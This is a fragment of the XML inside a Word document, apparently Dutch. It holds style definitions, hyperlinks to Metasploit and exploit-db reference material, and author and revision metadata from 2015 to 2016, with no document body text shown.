    <w:basedOn w:val="Standaardalinea-lettertype"/>
    <w:link w:val="Kop3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D914C0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B675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51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6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C6792"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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54966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65496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54966"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="2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7933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hyperlink" Target="https://www.exploit-db.com/docs/18229.pdf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hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed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hyperlink" Target="https://www.rapid7.com/db/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hyperlink" Target="https://dev.metasploit.com/documents/meterpreter.pdf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AD88-F156-4541-93E3-EBFA548D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1</Pages>
  <Words>2471</Words>
  <Characters>1359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auwerijs</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nick lauwerijs</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-03T12:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-14T20:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>